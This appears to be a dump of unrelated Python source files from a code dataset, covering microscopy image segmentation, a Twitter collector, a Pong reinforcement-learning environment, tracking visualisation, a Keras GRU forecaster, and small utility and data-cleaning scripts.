widths = tuple([s[-1], ] * 3)
environment = self.image_raw[extract_cube(s[:3], tuple(map(lambda x: 2 * 5 * x + 1, widths)))].copy()
# Mind points which are not at the center of the local environment (close to boundaries).
center = tuple(min(p, w // 2) for (p, w) in zip(s[:3], environment.shape))
noise_radius_ratio = 2
mask_noise, mask_spot = ellipsis(tuple(map(lambda x: noise_radius_ratio * 2 * x, widths)),
environment.shape,
center,
hole_radius_ratio=1 / noise_radius_ratio)
# get the spot signal
spot_signal = environment[mask_spot]
# Now filter it out from the environment
noise_signal = environment[mask_noise]
# Now compute the SNR
mean_noise = numpy.mean(noise_signal)
energy_noise = numpy.std(noise_signal)
energy_spot = numpy.sqrt(numpy.sum((spot_signal - mean_noise) ** 2) / spot_signal.shape[0])
if energy_noise == 0:
continue
else:
snr = energy_spot / energy_noise
snrs.append(snr)
self.SNR = snrs
if len(snrs) == 0:
print('No SNR computed.')
self.SNR = None
if boxplot:
f, ax = plt.subplots()
ax.boxplot(snrs)
ax.set_title('SNRs computed.')
ax.grid()
f.show()
    def assign(self):
        """
        Assign each detected spot to the segmented sub-cell (region label) it falls in.

        Spots landing on an unlabelled pixel (label 0) are attached to the nearest
        labelled region via find_nearest_region instead.

        NOTE(review): ``self.cells`` is never set on FQimage in this file (the
        deprecated ``split`` method also references it) -- confirm it is populated
        elsewhere before calling. Also assumes a Spot supports ``s[:2]`` slicing to
        its (x, y) coordinates -- TODO confirm against the Spot class.
        :return: None
        """
        for s in self.spots:
            if self.cells[s[:2]] == 0:
                # pixel is background in the label image: snap to nearest region
                label = find_nearest_region(self.cells, *s[:2])
            else:
                label = self.cells[s[:2]]
            s.region = label
@extend_class(show_nucleis)
class DAPIimage(FQimage):
    """FQimage specialisation for DAPI-stained images (nuclei channel)."""

    def __init__(self, verbose=1, data=None, shape=(512, 512, 35)):
        super(DAPIimage, self).__init__(verbose=verbose, data=data, shape=shape)
        self.nucleis = None  # label image, filled in by segment()

    def segment(self, sg=NucleiSegmenter()):
        """
        Segment the nuclei of a DAPI image.

        Workflow (delegated to the segmenter): MIP -> local gradient -> Otsu
        thresholding -> connected-components labelling -> filtering of
        components by size (hand threshold or KMeans) to separate actual
        cells from noise components.

        NOTE(review): the default ``sg=NucleiSegmenter()`` is evaluated once
        at definition time and shared across calls -- fine if the segmenter
        is stateless; confirm.

        :param sg: A segmenter object exposing ``method(image)``.
        :return: None.
        """
        # mask_path = self.name.replace('w1', 'w3').replace('561', '405')
        # cell_mask = io.imread(mask_path)
        # self.mask = numpy.swapaxes(cell_mask, 0, 2)
        with warnings.catch_warnings():
            warnings.simplefilter('ignore')
            if self._verbose > 0:
                print('Segmenting...', end='', flush=True)
            self.nucleis = sg.method(self.image_raw)
            if self._verbose > 0:
                # unique() includes the background label, hence the -1.
                print('%i nucleis found.' % (numpy.unique(self.nucleis).shape[0] - 1))

    def split(self):
        """
        DEPRECATED.  Split the image into one padded sub-image per segmented
        region.  Counting spots per label directly fails when a region has an
        open boundary (e.g. a 'C'-shaped segmentation of a round cell): spots
        inside the cell are not labelled as belonging to the 'C' region.

        NOTE(review): reads ``self.cells``, which DAPIimage itself never sets
        (it sets ``self.nucleis``) -- presumably assigned elsewhere; confirm.

        :return: list of FQimage sub-images, one per region.
        """
        sub_images = []
        for region in regionprops(self.cells):
            minr, minc, maxr, maxc = region.bbox
            # Pad 10 px on the min side (clamped at 0) to keep context.
            sub_image = self.image_raw[max(0, minr - 10):maxr, max(0, minc - 10):maxc, :]
            sub_images.append(FQimage(data=sub_image))
        return sub_images
@extend_class(show_cells)
class CYTimage(FQimage):
    """FQimage specialisation for cytoplasm segmentation, guided by an
    already-segmented nuclei label image."""

    def __init__(self, nuclei_image, verbose=1, data=None, shape=(512, 512, 35)):
        super(CYTimage, self).__init__(verbose=verbose, data=data, shape=shape)
        self.nuclei_image = nuclei_image
        # A label image with a single unique value contains only background.
        if numpy.unique(nuclei_image).shape[0] == 1:
            raise UserWarning('No nuclei detected on the given nuclei image.')
        self.cells = None  # label image, filled in by segment()

    def segment(self, sg=CytoSegmenter()):
        """
        Segment the cells (cytoplasm) of the image, seeded by the nuclei mask.

        Workflow (delegated to the segmenter): MIP -> local gradient -> Otsu
        thresholding -> connected-components labelling -> filtering of
        components by size (hand threshold or KMeans) to separate actual
        cells from noise components.

        NOTE(review): the default ``sg=CytoSegmenter()`` is evaluated once at
        definition time and shared across calls -- confirm the segmenter is
        stateless.

        :param sg: A segmenter object exposing ``method(image, nuclei_image)``.
        :return: None.
        TODO: merge the two segmenting methods into one, criterion of choice
        being AIC of the GMM.
        """
        # mask_path = self.name.replace('w1', 'w3').replace('561', '405')
        # cell_mask = io.imread(mask_path)
        # self.mask = numpy.swapaxes(cell_mask, 0, 2)
        with warnings.catch_warnings():
            warnings.simplefilter('ignore')
            if self._verbose > 0:
                print('Segmenting...', end='', flush=True)
            self.cells = sg.method(self.image_raw, self.nuclei_image)
            if self._verbose > 0:
                # unique() includes the background label, hence the -1.
                print('%i cells found.' % (numpy.unique(self.cells).shape[0] - 1))
|
12,907 | 8c51f8922479e62656231f8eff9fa12beb5c1ea3 | import collect
import db
def dist(targets, lo, hi, nbucket):
    """
    Distribute targets[lo, hi) round-robin into nbucket partitions.

    The distribution is consumed by nbucket worker processes for parallel
    computation.  Indices outside [0, len(targets)) are silently skipped, so
    callers may pass an over-wide [lo, hi) range.

    :param targets: sequence of work items
    :param lo: inclusive start index into targets
    :param hi: exclusive end index into targets
    :param nbucket: number of partitions to produce
    :return: list of nbucket lists; item i goes into bucket i % nbucket
    """
    # A list comprehension (not [[]] * nbucket) so each bucket is distinct.
    distribution = [[] for _ in range(nbucket)]
    for i in range(lo, hi):
        # Chained comparison replaces the old `0 <= i and i < len(targets)`.
        if 0 <= i < len(targets):
            distribution[i % nbucket].append(targets[i])
    return distribution
def runner(args):
    """
    Sequentially collect tweets for a batch of users with a single API key.

    ``args`` is an ``(apikey, users)`` pair as produced by the driver's zip.
    A fresh database connection is opened for each user and closed (which
    commits the insertions) once that user's tweets are stored.
    """
    apikey, users = args
    api = collect.mk_api(apikey)
    for user in users:
        conn = db.mk_connection()
        handler = collect.mk_sql_insert_handler(conn)
        collect.collect_user_tweets(api, user, handler)
        db.close_connection(conn)
if __name__ == '__main__':
    import csv
    import multiprocessing
    import sys

    # One API key per line, comma-separated fields -> tuple per key.
    apikeys = [tuple(s.strip() for s in l.split(',')) for l in open('../../../.tw-apikeys')]
    # First CSV column holds the target user ids; skip the header row.
    targets = [r[0] for r in ([l for l in csv.reader(open('../../connections/connection_as_follower_min5.csv'))][1:])]
    # if one command line argument is supplied, treat it as a list of users
    if len(sys.argv) == 2:
        api = collect.mk_api(apikeys[0])
        users = [int(s) for s in sys.argv[1].split(',')]
        for user in users:
            print(user)
            db_connection = db.mk_connection()
            collect.collect_user_tweets(api, user, collect.mk_sql_insert_handler(db_connection), err = 'raise')
            db.close_connection(db_connection)
    # if two command line arguments are supplied, treat them as [lo, hi) indexing into set targets
    if len(sys.argv) == 3:
        lo, hi = int(sys.argv[1]), int(sys.argv[2])
        distribution = dist(targets, lo, hi, len(apikeys))
        try:
            with multiprocessing.Pool(processes = len(apikeys)) as pool:
                # Drain the iterator so all submitted work actually runs.
                for _ in pool.imap_unordered(runner, list(zip(apikeys, distribution))):
                    pass
        except KeyboardInterrupt:
            # BUG fix: `error` was undefined here (NameError on Ctrl-C), and
            # pool.terminate() was called after the with-block had already
            # terminated the pool.  The context manager handles cleanup.
            print('KeyboardInterrupt', file=sys.stderr)
|
12,908 | 930a5476dbb528d95ea10f350f69e44747fd3b0f | #Programa que ajude a sortear 1 aluno entre 4
import random
# Read four student names, normalising capitalisation with .title().
aluno1 = input('Digite o nome de um aluno: ').title()
aluno2 = input('Digite o nome de um aluno: ').title()
aluno3 = input('Digite o nome de um aluno: ').title()
aluno4 = input('Digite o nome de um aluno: ').title()
alunos = [aluno1, aluno2, aluno3, aluno4]
# Sorting is cosmetic only: it does not change the uniform random draw below.
alunos.sort()
# Draw and announce one student at random.
print(random.choice(alunos))
|
12,909 | 84da72777059a1a891f3ff3c8a78927c6ace1eee | #!/usr/bin/env python3
# Pong
# Written in 2013 by Julian Marchant <onpon4@riseup.net>
#
# To the extent possible under law, the author(s) have dedicated all
# copyright and related and neighboring rights to this software to the
# public domain worldwide. This software is distributed without any
# warranty.
#
# You should have received a copy of the CC0 Public Domain Dedication
# along with this software. If not, see
# <http://creativecommons.org/publicdomain/zero/1.0/>.
import sge
import Queue
import threading
import numpy.random as random
PADDLE_SPEED = 2
COMPUTER_PADDLE_SPEED = 2
PADDLE_VERTICAL_FORCE = 1 / 12
BALL_START_SPEED = 2
BALL_ACCELERATION = 0.1
BALL_MAX_SPEED = 15
SIM_STEP = 0.001
class glob:
    # This class is for global variables. While not necessary, using a
    # container class like this is less potentially confusing than using
    # actual global variables.
    players = [None, None]      # paddle objects; index 0 = left, 1 = right
    ball = None                 # the single Ball instance
    hud_sprite = None           # optional HUD overlay sprite (currently unused)
    bounce_sound = None         # sound placeholders (never loaded here)
    bounce_wall_sound = None
    score_sound = None
    game_in_progress = True
    sim_time = 0.0              # accumulated simulated time (HUD debugging)
    hits = [0, 0]               # per-player successful paddle hits
    misses = [0, 0]             # per-player missed balls (points conceded)
class Game(sge.Game):
    """Top-level game object: global hotkeys, pause handling and the
    quit-confirmation dialog."""

    def event_key_press(self, key, char):
        if key == 'f8':
            # Screenshot hotkey.
            sge.Sprite.from_screenshot().save('screenshot.jpg')
        elif key == 'escape':
            self.event_close()
        elif key in ('p', 'enter'):
            self.pause()

    def event_close(self):
        # Ask for confirmation before quitting; button index 1 == "Yes".
        m = "Are you sure you want to quit?"
        if sge.show_message(m, ("No", "Yes")):
            self.end()

    def event_paused_key_press(self, key, char):
        if key == 'escape':
            # This allows the player to still exit while the game is
            # paused, rather than having to unpause first.
            self.event_close()
        else:
            self.unpause()

    def event_paused_close(self):
        # This allows the player to still exit while the game is paused,
        # rather than having to unpause first.
        self.event_close()

    # def event_step(self, t):
    #     if glob.sim_time % 0.01 <= 0.001:
    #         glob.hud_sprite.draw_clear()
    #         glob.hud_sprite.draw_text("hud", "%.2f" % glob.sim_time, sge.game.width / 2,
    #                                   0, color="white",
    #                                   halign=sge.ALIGN_RIGHT,
    #                                   valign=sge.ALIGN_TOP)
class ComputerPlayer(sge.StellarClass):
    """Paddle driven by an external agent: actions arrive on a thread-safe
    queue guarded by a lock."""

    # Class-level placeholders; real objects are injected in __init__.
    lock = None
    queue = None
    state_lock = None
    state_queue = None
    reward_lock = None
    reward_queue = None

    def __init__(self, lock, queue, reward_lock, reward_queue, player_num):
        # Left paddle for player 0, right paddle for player 1.
        x = 32 if player_num == 0 else sge.game.width - 32
        y = sge.game.height / 2
        self.player_num = player_num
        self.hit_direction = 1 if player_num == 0 else -1
        self.lock = lock
        self.queue = queue
        self.reward_lock = reward_lock
        self.reward_queue = reward_queue
        super(ComputerPlayer, self).__init__(x, y, sprite="paddle_pc")

    def event_step(self, time_passed):
        # Drain the action queue under the lock; the last queued action wins.
        move_direction = 0
        self.lock.acquire()
        while not self.queue.empty():
            move_direction = self.queue.get()
        self.lock.release()
        self.yvelocity = move_direction * COMPUTER_PADDLE_SPEED

        # Keep the paddle inside the window
        if self.bbox_top < 0:
            self.bbox_top = 0
        elif self.bbox_bottom > sge.game.height:
            self.bbox_bottom = sge.game.height
class Player(sge.StellarClass):
    """Human-controlled paddle, moved with the up/down arrow keys."""

    def __init__(self, player_num):
        self.up_key = "up"
        self.down_key = "down"
        # Left paddle for player 0, right paddle for player 1.
        x = 32 if player_num == 0 else sge.game.width - 32
        self.player_num = player_num
        self.hit_direction = 1 if player_num == 0 else -1
        y = sge.game.height / 2
        super(Player, self).__init__(x, y, 0, sprite="paddle")

    def event_step(self, time_passed):
        # Movement: +1 down, -1 up, 0 when both or neither are pressed.
        key_motion = (sge.get_key_pressed(self.down_key) -
                      sge.get_key_pressed(self.up_key))

        self.yvelocity = key_motion * PADDLE_SPEED

        # Keep the paddle inside the window
        # NOTE(review): clamps the paddle *centre* (self.y), unlike
        # ComputerPlayer which clamps the bounding box -- so half the paddle
        # can leave the screen; confirm whether intentional.
        if self.y < 0:
            self.y = 0
        elif self.y > sge.game.height:
            self.y = sge.game.height
class Ball(sge.StellarClass):
    """The ball: handles scoring, wall bounces, paddle collisions, and
    reports rewards/state to the learning agents via shared queues."""

    # NOTE(review): unlike ComputerPlayer, reward_lock/reward_queue here are
    # the per-player *pairs* (indexed by player number) -- confirm.
    reward_lock = None
    reward_queue = None
    state_lock = None
    state_queue = None

    def __init__(self, reward_lock, reward_queue, state_lock, state_queue):
        x = sge.game.width / 2
        y = sge.game.height / 2
        self.reward_lock = reward_lock
        self.reward_queue = reward_queue
        self.state_lock = state_lock
        self.state_queue = state_queue
        super(Ball, self).__init__(x, y, 1, sprite="ball")

    def event_create(self):
        self.serve()

    def event_step(self, time_passed):
        # Scoring: the ball fully left the playfield on one side.
        loser = None
        if self.bbox_right < 0:
            loser = 0
        elif self.bbox_left > sge.game.width:
            loser = 1

        if loser is not None:
            glob.misses[loser] += 1
            # Serve towards the side that just conceded the point.
            self.serve(1 if loser == 0 else -1)
            self.reward_lock[loser].acquire()
            if not self.reward_queue[loser].full():
                # Flat -1 penalty for missing the ball.
                self.reward_queue[loser].put(-1)
            self.reward_lock[loser].release()

        # Bouncing off of the edges, damped to 75% vertical speed.
        if self.bbox_bottom > sge.game.height:
            self.bbox_bottom = sge.game.height
            self.yvelocity = -abs(self.yvelocity) * 0.75
        elif self.bbox_top < 0:
            self.bbox_top = 0
            self.yvelocity = abs(self.yvelocity) * 0.75

        # Publish the current game state (ball + both paddle positions).
        self.state_lock.acquire()
        if not self.state_queue.full():
            self.state_queue.put(glob.ball.x)
            self.state_queue.put(glob.ball.y)
            self.state_queue.put(glob.players[0].y)
            self.state_queue.put(glob.players[1].y)
        self.state_lock.release()

    def event_collision(self, other):
        if isinstance(other, (ComputerPlayer, Player)):
            if other.player_num == 0:
                # Push the ball clear of the left paddle, accelerate rightward.
                self.bbox_left = other.bbox_right + 1
                self.xvelocity = min(abs(self.xvelocity) + BALL_ACCELERATION, BALL_MAX_SPEED)
                hitter = 0
            else:
                self.bbox_right = other.bbox_left - 1
                self.xvelocity = max(-abs(self.xvelocity) - BALL_ACCELERATION, -BALL_MAX_SPEED)
                hitter = 1
            # Vertical deflection scales with how far off-centre the hit was.
            self.yvelocity += (self.y - other.y) * (PADDLE_VERTICAL_FORCE + 0.01)
            glob.hits[hitter] += 1
            self.reward_lock[hitter].acquire()
            if not self.reward_queue[hitter].full():
                # +1 reward for a successful return.
                self.reward_queue[hitter].put(1)
            self.reward_lock[hitter].release()

    def serve(self, direction=1):
        """Restart the ball towards `direction`, offset towards the receiver
        and at a random vertical position."""
        self.x = sge.game.width / 2 + (200 if direction == -1 else -200)
        self.y = random.randint(0, sge.game.height)

        # Next round
        self.xvelocity = BALL_START_SPEED * direction
        self.yvelocity = 0
def main(players, action_lock, action_queue, reward_lock, reward_queue, state_lock, state_queue, seed=None):
    """
    Build the Pong game (sprites, background, paddles, ball) and run it.

    :param players: pair of markers; "human" selects Player, anything else
        selects ComputerPlayer for that side.
    :param action_lock/action_queue: per-player action channels for agents.
    :param reward_lock/reward_queue: per-player reward channels.
    :param state_lock/state_queue: shared game-state channel.
    :param seed: optional numpy.random seed for reproducible serves.
    """
    random.seed(seed)

    # Create Game object
    Game(640, 480, fps=120)

    # Load sprites (plain white rectangles drawn at runtime).
    paddle_sprite = sge.Sprite(ID="paddle", width=8, height=80, origin_x=4,
                               origin_y=40)
    paddle_sprite.draw_rectangle(0, 0, paddle_sprite.width,
                                 paddle_sprite.height, fill="white")
    paddle_sprite_pc = sge.Sprite(ID="paddle_pc", width=8, height=80, origin_x=4,
                                  origin_y=40)
    paddle_sprite_pc.draw_rectangle(0, 0, paddle_sprite.width,
                                    paddle_sprite.height, fill="white")
    ball_sprite = sge.Sprite(ID="ball", width=32, height=32, origin_x=16,
                             origin_y=16)
    ball_sprite.draw_rectangle(0, 0, ball_sprite.width, ball_sprite.height,
                               fill="white")
    # (HUD sprite / font setup intentionally left disabled.)

    # Load backgrounds
    layers = (sge.BackgroundLayer("ball", sge.game.width / 2, 0, -10000,
                                  xrepeat=False),)
    background = sge.Background (layers, "black")

    # Create objects: one paddle per side, plus the ball.
    for i in range(2):
        glob.players[i] = Player(i) if players[i] == "human" else \
            ComputerPlayer(action_lock[i], action_queue[i],
                           reward_lock[i], reward_queue[i], i)
    glob.ball = Ball(reward_lock, reward_queue, state_lock, state_queue)
    objects = glob.players + [glob.ball]

    # Create rooms
    room1 = sge.Room(objects, background=background)

    sge.game.start()
if __name__ == '__main__':
    # NOTE(review): main() takes seven required positional arguments
    # (players, locks, queues); calling it bare raises TypeError -- this
    # module is presumably always driven by an external harness; confirm.
    main()
|
12,910 | c894a2351bbf2024303bd509a29d6bda4d9b2f4a | # vim: expandtab:ts=4:sw=4
import numpy as np
import colorsys
from .image_viewer import ImageViewer
import cv2
import time
def create_unique_color_float(tag, hue_step=0.41):
    """Create a unique RGB color code for a given track id (tag).

    The color is picked in HSV space: the hue advances by `hue_step` per
    tag (wrapping at 1.0) while the value cycles through four brightness
    levels, so nearby tags stay visually distinct.

    Parameters
    ----------
    tag : int
        The unique target identifying tag.
    hue_step : float
        Hue-channel distance between two neighboring color codes.

    Returns
    -------
    (float, float, float)
        RGB color code in range [0, 1]
    """
    scaled = tag * hue_step
    hue = scaled % 1
    value = 1.0 - (int(scaled) % 4) / 5.0
    return colorsys.hsv_to_rgb(hue, 1.0, value)
def create_unique_color_uchar(tag, hue_step=0.41):
    """Create a unique RGB color code for a given track id (tag).

    Same palette as :func:`create_unique_color_float`, but quantized to
    8-bit channel values for direct use with OpenCV drawing calls.

    Parameters
    ----------
    tag : int
        The unique target identifying tag.
    hue_step : float
        Hue-channel distance between two neighboring color codes.

    Returns
    -------
    (int, int, int)
        RGB color code in range [0, 255]
    """
    float_rgb = create_unique_color_float(tag, hue_step)
    return tuple(int(255 * channel) for channel in float_rgb)
class NoVisualization(object):
    """
    Dummy visualization object: lets callers loop over all frames of a
    sequence and update the tracker without drawing anything.
    """

    def __init__(self, min_frame):
        # Both counters start at the first frame of the sequence.
        self.pre_frame = min_frame
        self.frame_idx = min_frame

    def update_frame(self, idx):
        # Only the previous-frame marker advances.
        self.pre_frame = idx
class Visualization(object):
    """Draw detections, ground truth and tracker output onto frames via an
    ImageViewer, using one stable color per track id."""

    def __init__(self, output_file, seq_name, min_frame):
        # Fixed display resolution (width, height).
        image_shape = 960, 540
        self.viewer = ImageViewer(output_file, seq_name, 5, image_shape)
        self.viewer.thickness = 2
        self.pre_frame = min_frame
        self.frame_idx = min_frame

    def update_frame(self, idx):
        self.pre_frame = idx

    def set_image(self, image):
        self.viewer.image = image

    def draw_groundtruth(self, track_ids, boxes):
        """Draw one labelled rectangle per ground-truth box."""
        self.viewer.thickness = 2
        for track_id, box in zip(track_ids, boxes):
            self.viewer.color = create_unique_color_uchar(track_id)
            # BUG fix: `np.int` was removed in NumPy 1.24; the builtin int
            # dtype is the documented replacement.
            self.viewer.rectangle(*box.astype(int), label=str(track_id))

    def draw_detections(self, detections, p):
        """Draw raw detections (red) plus the region-of-interest polygon."""
        self.viewer.thickness = 2
        self.viewer.color = 0, 0, 255
        self.viewer.polygen(p)
        for i, detection in enumerate(detections):
            self.viewer.rectangle(*detection.tlwh)

    def draw_trackers(self, tracks):
        """Draw confirmed, recently-updated tracks with id labels and
        trajectories."""
        self.viewer.thickness = 2
        for track in tracks:
            # Skip tentative tracks and tracks that have gone stale.
            if not track.is_confirmed() or track.time_since_update > 1:
                continue
            self.viewer.color = create_unique_color_uchar(track.track_id)
            # BUG fix: np.int -> int (removed NumPy alias).
            self.viewer.rectangle(
                *track.to_tlwh().astype(int), label=str(track.track_id))
            self.viewer.trajectory(track.center)

    def draw_kcf_trackers(self, tracks):
        """Same as draw_trackers but for KCF tracks exposing a raw bbox."""
        self.viewer.thickness = 2
        for track in tracks:
            if not track.is_confirmed() or track.time_since_update > 1:
                continue
            self.viewer.color = create_unique_color_uchar(track.track_id)
            r = track.bbox
            self.viewer.rectangle(int(r[0]), int(r[1]), int(r[2]), int(r[3]), label=str(track.track_id))
12,911 | 6bc0ae273fecb1736cac256b5c7c939eebcfd676 | from __future__ import division # confidence high
# Package name and setup() keyword arguments consumed by the stsci build
# machinery for the numdisplay (DS9 display) package.
pkg = "stsci.numdisplay"

setupargs = {
    'version' : "1.5",
    'description' : "Package for displaying numpy arrays in DS9",
    'author' : "Warren Hack",
    'maintainer_email': "help@stsci.edu",
    'url' : "",
    'license' : "http://www.stsci.edu/resources/software_hardware/pyraf/LICENSE",
    'platforms' : ["any"],
    # Map the dotted package name onto its on-disk source directory.
    'package_dir' : { 'stsci.numdisplay' : 'lib/stsci/numdisplay' },
    # Non-Python files shipped alongside the package (imtool lookup tables).
    'data_files' : [ ( 'stsci/numdisplay', ['lib/stsci/numdisplay/imtoolrc', 'LICENSE.txt','lib/stsci/numdisplay/ichar.dat'] )],
}
|
12,912 | 1e21d420b57660b20a5f6220f08306be5bf8cec4 | import json
import numpy as np
from keras import Sequential
from keras.callbacks import TensorBoard
from keras.layers import LSTM, Dense, RepeatVector, TimeDistributed, GRU
from data_prep import gen_cosine_amp_for_supervised as gen_testdata
from data_prep import print_data, series_to_supervised
from ufcnn import ufcnn_model_concat
from ufcnn_own import ufcnn_model
# --- Hyper-parameters -------------------------------------------------------
sequence_length = 672  # same as in Roni Mittelman's paper - this is 2 times 32 - a line in Ronis input contains 33 numbers, but 1 is time and is omitted
output_sequence_length = 192  # number of future steps to predict
features = 1  # guess changed Ernst 20160301
nb_filter = 50  # same as in Roni Mittelman's paper (UFCNN only; unused here)
filter_length = 5  # same as in Roni Mittelman's paper (UFCNN only; unused here)
output_dim = 1
batch_size = 64

# cos, train_y = gen_testdata(sequence_length*100)
# Raw market data: a list of records, each with a 'sell' price field.
with open('./ecto.json') as data_file:
    data = json.load(data_file)

# TensorBoard logging for this encoder-decoder run.
tb_callback = TensorBoard(log_dir='./logs/lstm/672_192', histogram_freq=10,
                          batch_size=batch_size, write_graph=True, write_grads=True,
                          write_images=True, embeddings_freq=0,
                          embeddings_layer_names=None, embeddings_metadata=None)

# Oldest-first price series -> first differences (0 prepended to keep the
# length) -> sliding supervised windows of past/future steps.
sell = np.array([float(d['sell']) for d in data])
sell = sell[::-1]
sell = np.insert(np.diff(sell), 0, 0)
sell = sell.reshape(-1, 1)
sell = series_to_supervised(sell, n_in=sequence_length, n_out=output_sequence_length)
train_x = sell.values[:, :sequence_length]
train_x = train_x.reshape(-1, sequence_length, 1)
train_y = sell.values[:, sequence_length:]
train_y = train_y.reshape(-1, output_sequence_length, 1)

# # train_y input data shape: (batch_size, timesteps, data_dim)
# Encoder-decoder GRU: encode the input window into one context vector,
# repeat it, then decode output_sequence_length steps.
model = Sequential()
model.add(GRU(150,
              return_sequences=False,
              input_shape=(sequence_length, features),
              dropout=0.4,
              #batch_input_shape=(batch_size, sequence_length, features),
              stateful=False))
model.add(RepeatVector(output_sequence_length))
model.add(GRU(150, return_sequences=True, dropout=0.4, stateful=False))
model.add(TimeDistributed(Dense(output_dim, activation='linear')))
model.compile(loss='mean_squared_error',
              optimizer='adam',
              metrics=['accuracy'])
# shuffle=False keeps the time ordering of the windows during training.
model.fit(train_x, train_y, validation_split=0.1,
          batch_size=batch_size,
          epochs=100,
          shuffle=False,
          callbacks=[tb_callback]
          )
# predicted = model.predict(x=cos, batch_size=batch_size)
|
def namelist():
    """
    Read strings from stdin until the sentinel "DONE", then print them
    right-aligned to the width of the longest entry.

    Behaviour matches the original: the first prompt carries instructions,
    subsequent reads are unprompted, and "DONE" itself is never listed.
    """
    # Collect the names to be aligned.  The old version appended DONE and
    # deleted it again, plus kept a dead variable `s`; this loop just stops.
    names = []
    entry = input("Enter strings (end with DONE):\n")
    while entry != "DONE":
        names.append(entry)
        entry = input('')
    # Width of the longest name (0 for an empty list, as before).
    width = max((len(name) for name in names), default=0)
    # Print the list right-aligned.
    print("")
    print("Right-aligned list:")
    for name in names:
        print(" " * (width - len(name)), name, sep="")


namelist()
12,914 | e4accced84e18cfb2bbb01cb334450b002d2e4ea | L = [12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38]
x = L[::-1]
print(x)
|
12,915 | 20989f52c02bb0fe7d5aaec9bd9c7f2aff872833 | # coding:utf-8
import csv, codecs
import re
# ๅๅค็๏ผๆๅจๆฟๆขcsvไธญ็้ๅท ๅ ้คไธ่ฏพๆถ้ด ๅฐ็น ๅ็ญ
'''
col0 ๅผ่ฏพ็ถๆ
col1 ่ฏพ็จๅ็งฐ
col2 ๅญฆๅ
col3 ่ๆ ธๆนๅผ
col4 ่ฏพ็จๆง่ดจ
col5 ไปป่ฏพๆๅธ
col6 ้่ฏพ่ฏพๅท
col7 ่ตทๆญขๅจ
col8 ไธ่ฏพๆถ้ด ele[9]
col9 ไธ่ฏพๅฐ็น ele[10]
col10 ๅผ่ฏพๅญฆ้ข ele[8]
col11 ๅ็ญไฟกๆฏ ele[11]
'''
# Preprocess the split timetable CSV: reorder/clean the time, location,
# faculty and group columns, strip embedded HTML, and rewrite as UTF-8
# (with BOM) CSV.  Column mapping follows the header comment above.
inputfile = './data/csv/2019-2020-2_split.csv'
outputfile = './data/csv/2019-2020-2-processed.csv'

# BUG fix: the input file was opened without ever being closed; use a
# context manager so the handle is released deterministically.
with open(inputfile, 'r', encoding='utf-8') as fp:
    lines = fp.readlines()

new_lines = []
for ele in lines[1:]:  # skip the header row
    ele = ele.split(",")
    # Columns 0-6 are kept unchanged.
    col0_6 = ele[0:7]
    # col7: date range -- normalise the separator characters.
    col7 = ele[7]
    if 'ๆ' in ele[7]:
        col7 = col7.replace("ๆ", "~")
        col7 = col7.replace("ๆฅ", "")
    # col8: class time, taken from ele[9]; strip HTML markup if present.
    col8 = ele[9]
    if 'title' in ele[9]:
        reg = re.compile(r'\=\"(.*?)\">')
        col8 = re.findall(reg, ele[9])[0]
    elif 'td' in ele[9]:
        reg = re.compile(r'<td>(.*?)</td>')
        col8 = re.findall(reg, ele[9])[0]
    # col9: class location, taken from ele[10].
    col9 = ele[10]
    if 'title' in ele[10]:
        reg = re.compile(r'\=\"(.*?)\">')
        col9 = re.findall(reg, ele[10])[0]
    elif 'td' in ele[10]:
        reg = re.compile(r'<td>(.*?)</td>')
        col9 = re.findall(reg, ele[10])[0]
    # col11: group information, taken from ele[11].
    # BUG fix: this default was previously assigned to col10, leaving col11
    # undefined (NameError) whenever ele[11] contained neither marker.
    col11 = ele[11]
    if 'title' in ele[11]:
        reg = re.compile(r'\=\"(.*?)\">')
        col11 = re.findall(reg, ele[11])[0]
    elif 'td' in ele[11]:
        reg = re.compile(r'<td>(.*?)</td>')
        col11 = re.findall(reg, ele[11])[0]
    # col10: offering faculty, taken from ele[8] unchanged.
    col10 = ele[8]
    cur_line = col0_6 + [str(col7)] + [str(col8)] + [str(col9)] + [str(col10)] + [str(col11)]
    new_lines.append(cur_line)

# Write out as UTF-8 CSV with a BOM so spreadsheet tools detect the encoding.
with open(outputfile, 'w', newline='', encoding="utf-8") as csv_file:
    csv_file.write(codecs.BOM_UTF8.decode())
    writer = csv.writer(csv_file)
    for row in new_lines:
        writer.writerow(row)
12,916 | e16dce6ee4038c52f55588a4ed8f5bfcf7810b09 | import re
import editor
import pickle
import tools
month_dic = {"01": "ัะฝะฒะฐัั", "02": "ัะตะฒัะฐะปั", "03": "ะผะฐััะฐ", "04": "ะฐะฟัะตะปั", "05": "ะผะฐั", "06": "ะธัะฝั",
"07": "ะธัะปั", "08": "ะฐะฒะณัััะฐ", "09": "ัะตะฝััะฑัั", "10": "ะพะบััะฑัั", "11": "ะฝะพัะฑัั", "12": "ะดะตะบะฐะฑัั"}
month_dic2 = {"01": "ะฏะฝะฒะฐัั", "02": "ะคะตะฒัะฐะปั", "03": "ะะฐัั", "04": "ะะฟัะตะปั", "05": "ะะฐะน", "06": "ะัะฝั",
"07": "ะัะปั", "08": "ะะฒะณััั", "09": "ะกะตะฝััะฑัั", "10": "ะะบััะฑัั", "11": "ะะพัะฑัั", "12": "ะะตะบะฐะฑัั"}
user_prefix = ["u", "U", "user", "User", "ั", "ะฃ", "ััะฐััะฝะธะบ", "ััะฐััะฝะธัะฐ", "ะฃัะฐััะฝะธะบ", "ะฃัะฐััะฝะธัะฐ"]
def good_stater():
    """
    Crawl the wiki's "good article candidate" daily nomination pages, parse
    each nominated article's nominator, closure verdict and closer, check the
    current status templates on the article and its talk page, and persist
    everything incrementally into the pickled "good_data" working dict.

    The working dict maps date strings -> {article name -> info dict} plus a
    "nonfinish_date_list" of dates whose nominations are not yet all closed.
    """
    # Load the working dict from disk, creating an empty one on first run.
    work_dic = {}
    try:
        work_dic = pickle.load(open("good_data", "rb"))
    except:
        print("no data. create new")
        pickle.dump(work_dic, open("good_data", "wb"))
    # Extract the list of not-yet-finished dates from it.
    nonfinish_date_list = []
    try:
        nonfinish_date_list = work_dic["nonfinish_date_list"]
    except:
        print("no nonfinish_date_list")
        work_dic["nonfinish_date_list"] = nonfinish_date_list
        pickle.dump(work_dic, open("good_data", "wb"))
    print("found "+str(len(nonfinish_date_list))+" nonfinished dates")
    cur_date = tools.get_date_str()
    cur_pos = 0
    is_last = False
    while not is_last:
        # Reload each iteration so progress saved below is always current.
        work_dic = pickle.load(open("good_data", "rb"))
        nonfinish_date_list = work_dic["nonfinish_date_list"]
        #nonfinish_date_list = ["270414"] #fixme
        #is_last = True
